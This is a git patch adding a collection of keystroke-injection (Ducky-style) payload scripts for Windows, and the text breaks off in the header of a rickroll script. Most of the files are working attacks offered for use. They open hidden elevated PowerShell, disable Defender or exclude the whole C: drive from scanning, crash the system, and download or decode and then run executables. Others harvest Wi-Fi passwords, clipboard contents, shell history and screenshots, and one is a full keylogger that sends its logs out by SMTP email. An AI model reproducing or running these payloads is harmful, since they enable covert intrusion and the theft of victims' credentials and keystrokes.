From bcb876063023e002788a16d9d85245849a39f98d Mon Sep 17 00:00:00 2001 From: beigeworm <93350544+beigeworm@users.noreply.github.com> Date: Mon, 8 May 2023 22:40:18 +0000 Subject: [PATCH] Add files via upload --- 5 second Screen Kill.txt | 20 + Add Exclusion C-drive.txt | 23 + BSOD.txt | 21 + Base64 Decode & Execute.txt | 30 ++ Disable RT-Protection.txt | 30 ++ Download-Execute from Run Prompt.txt | 23 + Dsktop Shortcut Spammer.txt | 24 + Email System & User Information.txt | 56 +++ Email System Info with Screenshot.txt | 61 +++ Installed Programs and Eventlogs to File.txt | 26 + Invoke Fake Update (.vbs).txt | 44 ++ Keylogger to Email.txt | 484 +++++++++++++++++++ Rickroll with Max Volume spam.txt | 51 ++ Set US Keyboard & System Language.txt | 30 ++ Simple NetCat Client.txt | 28 ++ Start Windows-93 (parody edition).txt | 33 ++ 16 files changed, 984 insertions(+) create mode 100644 5 second Screen Kill.txt create mode 100644 Add Exclusion C-drive.txt create mode 100644 BSOD.txt create mode 100644 Base64 Decode & Execute.txt create mode 100644 Disable RT-Protection.txt create mode 100644 Download-Execute from Run Prompt.txt create mode 100644 Dsktop Shortcut Spammer.txt create mode 100644 Email System & User Information.txt create mode 100644 Email System Info with Screenshot.txt create mode 100644 Installed Programs and Eventlogs to File.txt create mode 100644 Invoke Fake Update (.vbs).txt create mode 100644 Keylogger to Email.txt create mode 100644 Rickroll with Max Volume spam.txt create mode 100644 Set US Keyboard & System Language.txt create mode 100644 Simple NetCat Client.txt create mode 100644 Start Windows-93 (parody edition).txt diff --git a/5 second Screen Kill.txt b/5 second Screen Kill.txt new file mode 100644 index 0000000..ff855f8 --- /dev/null +++ b/5 second Screen Kill.txt @@ -0,0 +1,20 @@ +REM Title: 5 Second Display Kill +REM Author: @beigeworm +REM Description: Uses Powershell to kill all displays for a short period of time. +REM Target: Windows 10,11 + + +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window) +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +STRING (Add-Type '[DllImport("user32.dll")]public static extern int SendMessage +STRING (int hWnd, int hMsg, int wParam, int lParam);' -Name a -Pas)::SendMessage(-1,0x0112,0xF170,2);sleep 5;exit +ENTER diff --git a/Add Exclusion C-drive.txt b/Add Exclusion C-drive.txt new file mode 100644 index 0000000..32774f3 --- /dev/null +++ b/Add Exclusion C-drive.txt @@ -0,0 +1,23 @@ +REM Title: Add Exclusion C-drive +REM Author: @beigeworm +REM Description: Uses Powershell to add an exclusion to Windows Defender to ingore any files within C:/ +REM Target: Windows 10 + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window). +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM add the exclusion path. +STRING Add-MpPreference -ExclusionPath C:/ +ENTER +DELAY 250 +STRING exit +ENTER diff --git a/BSOD.txt b/BSOD.txt new file mode 100644 index 0000000..edb5ba8 --- /dev/null +++ b/BSOD.txt @@ -0,0 +1,21 @@ +REM Title: Invoke BSOD +REM Author: @beigeworm +REM Description: This will open powershell and cause a blue screen. +REM Target: Windows 10 + +REM ***This is a dangerous script - Be Careful!!!*** + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window) +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +STRING taskkill /f /im svchost.exe +ENTER diff --git a/Base64 Decode & Execute.txt b/Base64 Decode & Execute.txt new file mode 100644 index 0000000..8bef849 --- /dev/null +++ b/Base64 Decode & Execute.txt @@ -0,0 +1,30 @@ +REM Title: Base64 Decode & Execute +REM Author: @beigeworm +REM Description: Uses Powershell to decode a Base64 string and then execute the file. +REM Target: Windows 10 + +REM *SETUP* +REM replace all placeholders throughout the script. + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window) +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM *replace this below* +STRING $b64 = 'YOUR_BASE64_STRING_HERE_IN_SINGLE_QUOTES'; + +STRING $decodedFile = [System.Convert]::FromBase64String($b64); + + +REM *replace NAME_HERE and desired filetype (example is .exe)* +STRING $File = "NAME_HERE"+".exe"; + +STRING Set-Content -Path $File -Value $decodedFile -Encoding Byte;& $File \ No newline at end of file diff --git a/Disable RT-Protection.txt b/Disable RT-Protection.txt new file mode 100644 index 0000000..fa8c2b4 --- /dev/null +++ b/Disable RT-Protection.txt @@ -0,0 +1,30 @@ +REM Title: Disable Real-Time Protection +REM Author: @beigeworm +REM Description: Manually opens Windows Security window and turns offf Real-Time Protection. +REM Target: Windows 10 + + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open Windows Security GUI. +GUI r +DELAY 1500 +STRING windowsdefender:// +ENTER +DELAY 2000 + +REM run through option list and turn RT-protection off. +ENTER +TAB +TAB +TAB +TAB +ENTER +DELAY 200 +SPACE +DELAY 300 +ALT y +DELAY 400 +ALT F4 + diff --git a/Download-Execute from Run Prompt.txt b/Download-Execute from Run Prompt.txt new file mode 100644 index 0000000..ad1d856 --- /dev/null +++ b/Download-Execute from Run Prompt.txt @@ -0,0 +1,23 @@ +REM Title: Download-Execute from Run Prompt +REM Author: @beigeworm +REM Description: Uses the Run Prompt to download a file and run it. +REM Target: Windows 10 + +REM *SETUP* +REM replace FILE_URL_HERE with the url of your file to run. + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window). +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C cd $env:Temp;Add-MpPreference -ExclusionPath C:\;Start-Sleep 1; + +REM replace FILE_URL_HERE below. +STRING iwr -Uri FILE_URL_HERE -OutFile upl.exe;Start-Sleep 1;Start upl.exe;exit + +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 diff --git a/Dsktop Shortcut Spammer.txt b/Dsktop Shortcut Spammer.txt new file mode 100644 index 0000000..bf7a47c --- /dev/null +++ b/Dsktop Shortcut Spammer.txt @@ -0,0 +1,24 @@ +REM Title: Dsktop Shortcut Spammer +REM Author: @beigeworm +REM Description: Uses Powershell to generate a specified amount of shortcuts on the desktop. +REM Target: Windows 10 + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window). +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM *replace 200 with the number of shortcuts you want to create.* +STRING $n = 200;$i = 0;while($i -lt $n){;$num = Get-Random;$Location = "C:\Windows\System32\rundll32.exe" + +REM rest of the script. +STRING ;$WshShell = New-Object -ComObject WScript.Shell;$Shortcut = $WshShell.CreateShortcut("$Home\Desktop\USB Hardware" + $num + ".lnk") +STRING ;$Shortcut.TargetPath = $Location;$Shortcut.Arguments ="shell32.dll,Control_RunDLL hotplug.dll";$Shortcut.IconLocation = "hotplug.dll,0" +STRING ;$Shortcut.Description ="Device Removal";$Shortcut.WorkingDirectory ="C:\Windows\System32";$Shortcut.Save();Start-Sleep -Milliseconds 10;$i++};sleep 10;exit \ No newline at end of file diff --git a/Email System & User Information.txt b/Email System & User Information.txt new file mode 100644 index 0000000..1e823de --- /dev/null +++ b/Email System & User Information.txt @@ -0,0 +1,56 @@ +REM Title: Email System & User Information +REM Author: @beigeworm +REM Description: Uses Powershell to gather user and system information and send to an Email. +REM Target: Windows 10 + +REM *REQUIREMENTS* +REM you will need a Microsoft Outlook Email address for this to work + +REM *SETUP* +REM replace EMAIL_HERE and PASSWORD_HERE below. + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window). +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM replace EMAIL_HERE and PASSWORD_HERE below. +STRING $eml = "EMAIL_HERE";$psw = "PASSWORD_HERE" + +REM main powershell code +ENTER +DELAY 100 +STRING $usr = "Username: $($usrinf.Name)";$usr += "`nFull Name: $($usrinf.FullName)`n";$usr+="Public Ip Address = ";$usr+=((I`wr ifconfig.me/ip).Content.Trim() | Out-String) +STRING ;$usr+="`n";$usr+="All User Accounts: `n";$usr+= Get-WmiObject -Class Win32_UserAccount;$sys = Get-WmiObject -Class Win32_OperatingSystem +STRING ;$bios = Get-WmiObject -Class Win32_BIOS;$proc = Get-WmiObject -Class Win32_Processor;$comp = Get-WmiObject -Class Win32_ComputerSystem;$usrinf = Get-WmiObject -Class Win32_UserAccount +STRING ;$sysstr = "Operating System: $($sys.Caption) $($sys.OSArchitecture)";$sysstr += "`nBIOS Version: $($bios.SMBIOSBIOSVersion)";$sysstr += "`nProcessor: $($proc.Name)" +STRING ;$sysstr += "`nMemory: $($sys.TotalVisibleMemorySize) MB";$sysstr += "`nComputer Name: $($comp.Name)";$iprog = Get-WmiObject -Class Win32_Product | Select-Object -Property Name, Version +STRING ;$progstr = "Installed Programs:`n";foreach($program in $iprog){;$progstr += "$($program.Name) $($program.Version)`n"} + +STRING ;$a=0;$ws=(netsh wlan show profiles) -replace ".*:\s+" +STRING ;foreach($s in $ws){if($a -gt 1 -And $s -NotMatch " policy " -And $s -ne "User profiles" -And $s -NotMatch "-----" -And $s -NotMatch "" -And $s.length -gt 5){ +STRING ;$ssid=$s.Trim();if($s -Match ":"){$ssid=$s.Split(":")[1].Trim()};$pw=(netsh wlan show profiles name=$ssid key=clear);$pass="None" +STRING ;foreach($p in $pw){if($p -Match "Key Content"){$pass=$p.Split(":")[1].Trim();$wifistr+="SSID: $ssid`nPassw: $pass`n"}}}$a++;} +STRING ;$pshist = "$env:USERPROFILE\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" + +STRING ;" USER INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII;$usr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;" CLIPBOARD INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;Get-Clipboard | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;" POWERSHELL HISTORY`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;Get-Content $pshist | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;" SYSTEM INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$sysstr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;" WIFI INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$wifistr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;" PROGRAMS INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$progstr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append + +STRING ;$syslog = "$env:temp\sys.txt";$subj = "$env:COMPUTERNAME : : Results";$body = "$env:COMPUTERNAME : Info Scraper Results... : $time" +STRING ;$smtp = "smtp.outlook.com";$prt = "587";$cdtl = new-object Management.Automation.PSCredential $eml, ($psw | ConvertTo-SecureString -AsPlainText -Force) +STRING ;$time = Get-Date;$ct = $time.addminutes($lost) + +STRING ;send-mailmessage -from $eml -to $eml -subject $subj -body $body -Attachment $syslog -smtpServer $smtp -port $prt -credential $cdtl -usessl +STRING ;sleep 1;exit +ENTER \ No newline at end of file diff --git a/Email System Info with Screenshot.txt b/Email System Info with Screenshot.txt new file mode 100644 index 0000000..4aa9f42 --- /dev/null +++ b/Email System Info with Screenshot.txt @@ -0,0 +1,61 @@ +REM Title: Email System & User Information +REM Author: @beigeworm +REM Description: Uses Powershell to gather user and system information and send to an Email. +REM Target: Windows 10 + +REM *IMPORTANT NOTE - upon testing 7th may 23, this script is detected by defender and blocked* +REM TURN OFF RT-PROTECTION BEFORE RUNNING + +REM *REQUIREMENTS* +REM you will need a Microsoft Outlook Email address for this to work + +REM *SETUP* +REM replace EMAIL_HERE and PASSWORD_HERE below. + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window). +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM replace EMAIL_HERE and PASSWORD_HERE below. +STRING ;$email = "EMAIL_HERE";$pass = "PASSWORD_HERE" + +REM main powershell code +STRING ;$usr = "Username: $($usrinf.Name)";$usr += "`nFull Name: $($usrinf.FullName)`n";$usr+="Public Ip Address = ";$usr+=((I`wr ifconfig.me/ip).Content.Trim() | Out-String) +STRING ;$usr+="`n";$usr+="All User Accounts: `n";$usr+= Get-WmiObject -Class Win32_UserAccount;$sys = Get-WmiObject -Class Win32_OperatingSystem +STRING ;$bios = Get-WmiObject -Class Win32_BIOS;$proc = Get-WmiObject -Class Win32_Processor;$comp = Get-WmiObject -Class Win32_ComputerSystem;$usrinf = Get-WmiObject -Class Win32_UserAccount +STRING ;$sysstr = "Operating System: $($sys.Caption) $($sys.OSArchitecture)";$sysstr += "`nBIOS Version: $($bios.SMBIOSBIOSVersion)";$sysstr += "`nProcessor: $($proc.Name)" +STRING ;$sysstr += "`nMemory: $($sys.TotalVisibleMemorySize) MB";$sysstr += "`nComputer Name: $($comp.Name)";$iprog = Get-WmiObject -Class Win32_Product | Select-Object -Property Name, Version +STRING ;$progstr = "Installed Programs:`n";foreach($program in $iprog){;$progstr += "$($program.Name) $($program.Version)`n"} + +STRING ;$a=0;$ws=(netsh wlan show profiles) -replace ".*:\s+" +STRING ;foreach($s in $ws){if($a -gt 1 -And $s -NotMatch " policy " -And $s -ne "User profiles" -And $s -NotMatch "-----" -And $s -NotMatch "" -And $s.length -gt 5){ +STRING ;$ssid=$s.Trim();if($s -Match ":"){$ssid=$s.Split(":")[1].Trim()};$pw=(netsh wlan show profiles name=$ssid key=clear);$pass="None" +STRING ;foreach($p in $pw){if($p -Match "Key Content"){$pass=$p.Split(":")[1].Trim();$wifistr+="SSID: $ssid`nPassword: $pass`n"}}}$a++;} +STRING ;$pshist = "$env:USERPROFILE\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" + +STRING ;" USER INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII;$usr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;" CLIPBOARD INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;Get-Clipboard | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;;" POWERSHELL HISTORY`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;Get-Content $pshist | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;" SYSTEM INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$sysstr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;" WIFI INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$wifistr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append +STRING ;" PROGRAMS INFO`n" | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append;$progstr | Out-File -FilePath "$env:temp\sys.txt" -Encoding ASCII -Append + +STRING ;$scfile = "$env:temp\SC.png";Add-Type -AssemblyName System.Windows.Forms;Add-type -AssemblyName System.Drawing +STRING ;$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen;$Width = $Screen.Width;$Height = $Screen.Height;$Left = $Screen.Left;$Top = $Screen.Top +STRING ;$bitmap = New-Object System.Drawing.Bitmap $Width, $Height;$graphic = [System.Drawing.Graphics]::FromImage($bitmap) +STRING ;$graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size);$bitmap.Save($scfile, [System.Drawing.Imaging.ImageFormat]::png) + +STRING ;Sleep 3;$syslog = "$env:temp\sys.txt";$subj = "$env:COMPUTERNAME : : Results";$body = "$env:COMPUTERNAME : Info Scraper Results... : $time" +STRING ;$smtp = "smtp.outlook.com";$prt = "587";$cdtl = new-object Management.Automation.PSCredential $email, ($pass | ConvertTo-SecureString -AsPlainText -Force) +STRING ;$time = Get-Date;$ct = $time.addminutes($lost) +STRING ;send-mailmessage -from $email -to $email -subject $subj -body $body -Attachment $syslog,$scfile -smtpServer $smtp -port $prt -credential $cdtl -usessl +STRING ;sleep 10;exit +ENTER \ No newline at end of file diff --git a/Installed Programs and Eventlogs to File.txt b/Installed Programs and Eventlogs to File.txt new file mode 100644 index 0000000..25052e0 --- /dev/null +++ b/Installed Programs and Eventlogs to File.txt @@ -0,0 +1,26 @@ +REM Title: Programs and Eventlogs to File +REM Author: @beigeworm +REM Description: Uses Powershell to gather a list of installed programs and Windows Eventlogs and saves the info to a file. +REM Target: Windows 10 + +REM some setup for dukie script. +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window). +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM the main powershell script. +STRING $date = Get-Date -Format "yyyy-MM-dd-hh-mm-ss";$outputPath = "$env:temp\Osint-$date.txt";New-Item -ItemType File -Path $outputPath +STRING ;$installed = Get-WmiObject -Class Win32_Product | Select-Object -Property Name, Version, Vendor;$hotfixes = Get-WmiObject -Class Win32_QuickFixEngineering | Select-Object -Property HotFixID, Description, InstalledOn +STRING ;$removed = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object -Property DisplayName, DisplayVersion, Publisher, InstallDate | Where-Object {$_.DisplayName -ne $null} +STRING ;$installed | Format-Table -AutoSize | Out-File -FilePath $outputPath ;$hotfixes | Format-Table -AutoSize | Out-File -FilePath $outputPath -Append +STRING ;$removed | Format-Table -AutoSize | Out-File -FilePath $outputPath -Append;$userActivity = Get-EventLog -LogName Security -EntryType SuccessAudit | Where-Object {$_.EventID -eq 4624 -or $_.EventID -eq 4634} +STRING ;$userActivity | Out-File -FilePath $outputPath -Append;$hardwareInfo = Get-EventLog -LogName System | Where-Object {$_.EventID -eq 12 -or $_.EventID -eq 13};$hardwareInfo | Out-File -FilePath $outputPath -Append +STRING ;sleep 30;exit +ENTER diff --git a/Invoke Fake Update (.vbs).txt b/Invoke Fake Update (.vbs).txt new file mode 100644 index 0000000..c3af84b --- /dev/null +++ b/Invoke Fake Update (.vbs).txt @@ -0,0 +1,44 @@ +REM Title: Invoke Fake Windows Update +REM Author: @beigeworm +REM Description: Uses Powershell to create a .vbs script to open Chrome and fullscreen. +REM Target: Windows 10 + +REM some setup for dukie script. +DEFAULT_DELAY 200 + +REM open powershell (remove -W Hidden to show the window). +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +CTRL-SHIFT ENTER +DELAY 1500 +ALT y +DELAY 5000 + +REM create the .vbs script to start chrome and go fullscreen. +STRING cmd +ENTER +STRING cd $env:temp +ENTER +STRING copy con update.vbs +ENTER +STRING Set WshShell = WScript.CreateObject("WScript.Shell") +ENTER +STRING WshShell.Run "chrome.exe -new--window -kiosk https://fakeupdate.net/win8", 1, False +ENTER +STRING WshShell.Run "C:\Windows\System32\scrnsave.scr /s" +ENTER +STRING WScript.Sleep 200 +ENTER +STRING WshShell.SendKeys "{F11}" +ENTER +CTRL z +ENTER +STRING start update.vbs +ENTER +DELAY 1000 +STRING exit +ENTER +DELAY 1000 + + diff --git a/Keylogger to Email.txt b/Keylogger to Email.txt new file mode 100644 index 0000000..65d1e41 --- /dev/null +++ b/Keylogger to Email.txt @@ -0,0 +1,484 @@ +REM Title: Email System & User Info (old) +REM Author: @beigeworm +REM Description: Uses Powershell to gather system info and send it via Email. +REM Target: Windows 10 + +REM *NOTE* - There are a lot of ESCAPE characters half way down because typing speed is too fast for notepad. (Can be avoided by moving the mouse while flipper types) +REM this is a quick and dirty fix that i will revise in the near future. + +REM *REQUIREMENTS* +REM you will need a Microsoft Outlook Email address for this to work + +REM *SETUP* +REM replace YOUR_EMAIL and YOUR_PASSWORD. (check entire script) +REM set $runtime=1 to desired interval beetween emails (in minutes). Default is 1 minute. + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM Open Notepad for script building. +DELAY 1000 +GUI r +DELAY 500 +STRING notepad +ENTER +DELAY 2500 +STRING Do{$FromTo = "YOUR_EMAIL";$Pass = "YOUR_PASSWORD";$RunTime = 1;$TimesRun = 1;$getT = Get-Date;$Subj = "$env:COMPUTERNAME : log Results";$body = "$env:COMPUTERNAME : Results : $strt" +ENTER +STRING $SMTP = "smtp.outlook.com";$Prt = "587";$Creds = new-object Management.Automation.PSCredential $FromTo, ($Pass | ConvertTo-SecureString -AsPlainText -Force) +ENTER +STRING $Attachment = $strt = Get-Date;$end = $strt.addminutes($RunTime);function Start-Key($Path="$env:temp\log.txt"){$sigs = @' +ENTER +STRING [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] public static extern short GetAsyncKeyState(int virtualKeyCode); +ENTER +STRING [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int GetKeyboardState(byte[] keystate); +ENTER +STRING [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int MapVirtualKey(uint uCode, int uMapType); +ENTER +STRING [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags); +ENTER +STRING '@ +ENTER +ENTER +STRING $API = Add-Type -MemberDefinition $sigs -Name 'Win32' -Namespace API -PassThru;$null = New-Item -Path $Path -ItemType File -Force;try{$rnnr = 0;while ($TimesRun -ge $rnnr){ +ENTER +STRING while ($end -ge $getT){Start-Sleep -Milliseconds 30;for($ascii = 9; $ascii -le 254; $ascii++){$state = $API::GetAsyncKeyState($ascii);if($state -eq -32767){$null = [console]::CapsLock +ENTER +STRING $virtualKey = $API::MapVirtualKey($ascii, 3);$kbstate = New-Object Byte[] 256;$checkkbstate = $API::GetKeyboardState($kbstate);$mychar = New-Object -TypeName System.Text.StringBuilder +ENTER +STRING $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0);if($success){[System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)}}} +ENTER +STRING $getT = Get-Date};Sleep 3;send-mailmessage -from $FromTo -to $FromTo -subject $Subj -body $body -Attachment $Path -smtpServer $SMTP -port $Prt -credential $Creds -usessl +ENTER +STRING Remove-Item -Path $Path -force}}finally{$null = New-Item -Path $Path -ItemType File -Force}}Start-Key}While ($a -le 5) +ENTER +DELAY 1000 + +REM because typing speed can't be adjusted. (Can be avoided by moving the mouse while flipper types) +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE + + +DELAY 10000 +REM save in temp directory. +DELAY 1000 +CTRL-SHIFT s +DELAY 1500 +STRING %temp% +ENTER +STRING txtlog.ps1 +DELAY 500 +TAB +DOWN +DOWN +ENTER +ENTER +DELAY 1000 +ALT F4 + +REM Open Powershell and start logs. +DELAY 1000 +GUI r +DELAY 500 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C cd $env:temp;sleep 1; ./txtlog.ps1;sleep 5;exit +ENTER + diff --git a/Rickroll with Max Volume spam.txt b/Rickroll with Max Volume spam.txt new file mode 100644 index 0000000..220d077 --- /dev/null +++ b/Rickroll with Max Volume spam.txt @@ -0,0 +1,51 @@ +REM Title: Rickroll with Max Volume spam +REM Author: @beigeworm +REM Description: Uses Powershell to create a .vbs script to keep volume maximised and opens youtube for rickroll. +REM Target: 